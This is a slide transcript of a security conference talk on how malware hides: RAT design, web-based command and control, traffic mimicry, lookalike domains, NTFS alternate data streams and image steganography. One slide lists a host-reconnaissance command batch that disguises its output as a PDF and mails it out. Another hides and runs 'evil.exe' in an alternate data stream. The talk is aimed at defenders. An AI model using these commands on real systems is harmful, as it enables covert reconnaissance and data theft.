CodeStock14: Hiding in Plain Sight
-
Upload
rob-gillen -
Category
Technology
-
view
1.503 -
download
3
description
Transcript of CodeStock14: Hiding in Plain Sight
Hiding in Plain Sight
Presented by / Rob Gillen @argodev
This work is licensed under a .
This talk and related resources are available online:
Creative Commons Attribution 4.0 International License
https://github.com/argodev/talks/
DisclaimerThe content of this presentation represents my personal viewsand thoughts at the present time. I reserve the right to changemy views and opinions at any time. This content is not endorsedby, or representative in any way of my employer nor is itintended to be a view into my work or a reflection on the typeof work that I or my group performs. It is simply a hobby andpersonal interest and should be considered as such.
HTDCSHelpdesk Ticket Driven Cyber Security
Overview
RAT DesignEncryptionCommand/Control (C2)AntiVirusBehavior
RAT DesignExe is dropped via infected pageQueries web page for commandsPerforms commands if not done previouslyPeriodically polls for new commands
EncryptionComplex Encryption is trivialPBKDF – Scrypt sequential memory-hard functionMany iterations (> 10K)Long key-lengths
Encryption ExampleAbove configuration is custom-hardware resistantTakes approximately ¼ second per guess
Command/ControlUse Web2C ApproachCommands are “issued” en masse via normal, benign lookingweb pagesCommon portsLeverages existing HTML/server constructs
Command Text
ipconfig /all > %APPDATA%\info.txtnet start >> %APPDATA%\info.txttasklist /v >> %APPDATA%\info.txtnet user >> %APPDATA%\info.txtnet localgroup administrators >> %APPDATA%\info.txtnetstat -ano >> %APPDATA%\info.txtnet use >> %APPDATA%\info.txtcopy %APPDATA%\info.txt %APPDATA%\output.pdfdel %APPDATA%\info.txt
sendmail %APPDATA%\output.pdf Status Update “Jones, William E. [email protected]” [email protected] smtp.yourorg.gov
del %APPDATA%\output.pdf
Mimic User BehaviorTraffic RatesMonitor incoming/outgoing network traffic for X daysConfigure xfil to stay within X% of “normal”
C2Exponential/randomized stand-downOnly comm during periods of activity
Mimic User BehaviorTarget URLsMonitor outgoing web queries/URLs for X daysUse similar domain names for malicious trafficAppend similar/same query strings to malicious requests
Hiding in Logs
v-client-5b.sjc.dropbox.comsnt-re3-9a.sjc.dropbox.comyn-in-f125.1e100.netl1.ycs.vip.dcb.yahoo.comsnt-re3-9a.sjc.drpbox.comip-69-31-29-228.nlayer.neta23-47-20-211.deploy.static.akamaitechnologies.coml3.ycs.vip.dcb.yahoo.comir2.fp.vip.bf1.yahoo.comwww.nbcnews.com.edgesuite.netwac.946A.edgecastcdn.neta2.twimg.com
Other Hiding TechniquesOffice File content embeddingCreative locationAlternate Data StreamsLeast Significant BitNetwork Protocol Manipulation
Creative File Locations
Alternate Data StreamsFeature of NTFS since NT 3.5.1Used for metadata and compatibility with other file systems
So What?
#notepad pcast-nitrd-report-2010.pdf:secret.txt
What about this?
#type evil.exe > notepad.exe:evil.exe
#start notepad.exe:evil.exe
Crude Image Stego: LSBLeast Significant Bit – alter it and encode message acrossLSB through various bytesVisually imperceptibleComputationally challenging to detectEncryption also an option
LSB: How It Works
Carrier ImageImage Data:Size: 2.1 MBDimensions: 3500 x 2343 pxResolution: 300 dpiBit Depth: 24~ 8 Megapixel
“Secret” Message: Welcome! Remember, things aren’t always what they seem.
LSB Blow Up
Network Protocol Abuse
Challenges of Signature-Based Tools
Next StepsKnow what you can and can’t seeConsider implications of your monitoring strategyBehavior *must* play a role
Questions/ContactRob [email protected]://rob.gillenfamily.net@argodev
This talk and related resources are available online:https://github.com/argodev/talks/